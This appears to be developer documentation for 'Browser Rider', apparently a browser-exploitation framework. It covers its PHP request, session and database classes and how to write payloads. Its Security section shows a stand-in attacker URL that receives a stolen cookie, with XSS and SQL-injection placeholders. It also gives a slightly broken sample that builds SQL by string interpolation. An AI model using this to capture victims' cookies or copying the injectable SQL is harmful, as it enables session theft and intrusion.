Browser Rider Framework
From Engineering For Fun
Contents |
Smarty - Template Engine
Although Smarty is known as a "Template Engine", it would be more accurately described as a "Template/Presentation Framework." That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress the word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth.
Smarty is being used in Browser Rider to generated the templates and the payloads. It offers us the ability to have very clear and flexible payloads. If you are planning on programming your own payloads and don't have a clue about Smarty refer yourself to this website: http://www.smarty.net/
Browser Rider's framework
When programming under Browser Rider, the framework offers you a collection of classes and functions to use to facilitate the coding and integrate it in the tool.
PHP Class: ControlModule
This class provided us with the manipulation of the sessions and the HTTP requests.
class ControlModule extends ROOTModule { protected $http;//manages the http requests GET and POST protected $session;//manages the user session public function __construct() { parent::__construct(); $this->http = HTTPRequest::getInstance(); $this->session = SessionObject::getInstance(); } }
PHP Class: HTTPRequest class
Manages all the HTTP requests. Offers you the methods:
| static public function getInstance() |
|---|
| return the instance of the class HTTPRequest |
$this->http=HTTPRequest::getInstance(); |
| public function getVar($varname,$method=false) |
|---|
| Retrieves a variable in $_GET and $_POST |
$this->http->getVar('ip');//GET $this->http->getVar('data', 'post');//POST |
| public function getCleanString($varname,$method=false) |
|---|
| retrieves a variable (string) sent in a HTTP request and cleans it. |
$data=$this->http->getCleanString('data'); |
| public function getCleanInteger($varname,$method=false) |
|---|
| Retrieves an integer and cleans it. |
$this->http->getCleanInteger('id'); |
| public function redirect($url) |
|---|
| Redirect to a url |
$this->http->redirect('index.php'); |
| public function getIPAddress() |
|---|
| Return the ip address of the person |
$ip=$this->http->getIPAddress(); |
| public function getHttpReferer() |
|---|
| Return the referrer of the person |
$referer=$this->http->getHttpReferer(); |
PHP Class: SessionObject class
Manages the Session. Provides you with the functions:
| static public function getInstance() |
|---|
| return the instance of the class SessionObject |
$this->session=SessionObject::getInstance(); |
| public function __set($name,$value) |
|---|
| set a variable in the session |
$this->session->username='benjamin'; |
| public function __get($name) |
|---|
| get a variable in the session |
$username=$this->session->username; |
| public function __unset($name) |
|---|
| unset a variable in the session |
unset($this->session->username); |
| public function loginUser($username,$password) |
|---|
| try to login the user in Browser Rider |
$this->session->loginUser('hacker', 'hacker'); |
| public function isLoggedIn() |
|---|
| return true if the user is logged in, false if not |
if($this->session->isLoggedIn()) { ... } else die("not logged in"); |
PHP Class: Database
This class implements the singleton design pattern. It adds a layer between PHP databases functions and Browser Rider. In the future this will allow use to make Browser Rider compatible with many DBMS.
This class provides you the following methods:
- getInstance() gets the instance of the class (singleton)
- query($query) Execute an SQL Query
- fetchResult($result,$row,$field=null) Retrieves the contents of one cell
- fetchAssoc($result) Fetch a result row as an associative array
- fetchRow($result) Get a result row as an enumerated array
- numRows($result) Get number of rows in result
- affectedRows($result) Get number of affected rows in previous SQL operation
- dieError($file, $line) Returns the text of the error message from previous SQL operation
- disconnect() Closes the connection
JSMin
JSMin is a filter which removes comments and unnecessary whitespace from JavaScript files. It typically reduces filesize by half, resulting in faster downloads. It also encourages a more expressive programming style because it eliminates the download cost of clean, literate self-documentation.
You can get JSMin as a standalone for PHP here.
Browser Rider uses JSMin automatically on payloads that are not obfuscated in order to reduce their size.
Security
ANTIBUG Constant
When you code in Browser Rider try to put the following code on the top of each of your PHP scripts:
if(!defined('ANTIBUG')) exit;
It will protect against stupid full path disclosure if the script is accessed manually.
Protect against XSS & common SQL injections
When writing your payloads you should use the function getCleanString($varname,$method=false) in the HTTPRequest class. This function gather a string sent to the tool and cleans it before it is being used by any script.
To use this function, your payload should normally extends PayloadModule who extends ControlModule which has a attribute http who's an instance of the class HTTPRequest. So you can simply do like such:
$cookie = $this->http->getCleanString('cookie'); echo $COOKIE; $SQL = "INSERT INTO table (cookie) VALUE ('$cookie')";
http://www.evilsite.com/BrowserRider/attack.js?cookie=somevalue<script>[XSS attack]</script>'[SQLi attack]
It should protect you against cross-site scripting attacks and common sql injection attacks.
If you are retrieving a integer, HTTPRequest provides you with the secure function getCleanInteger($varname,$method=false) which works the same.
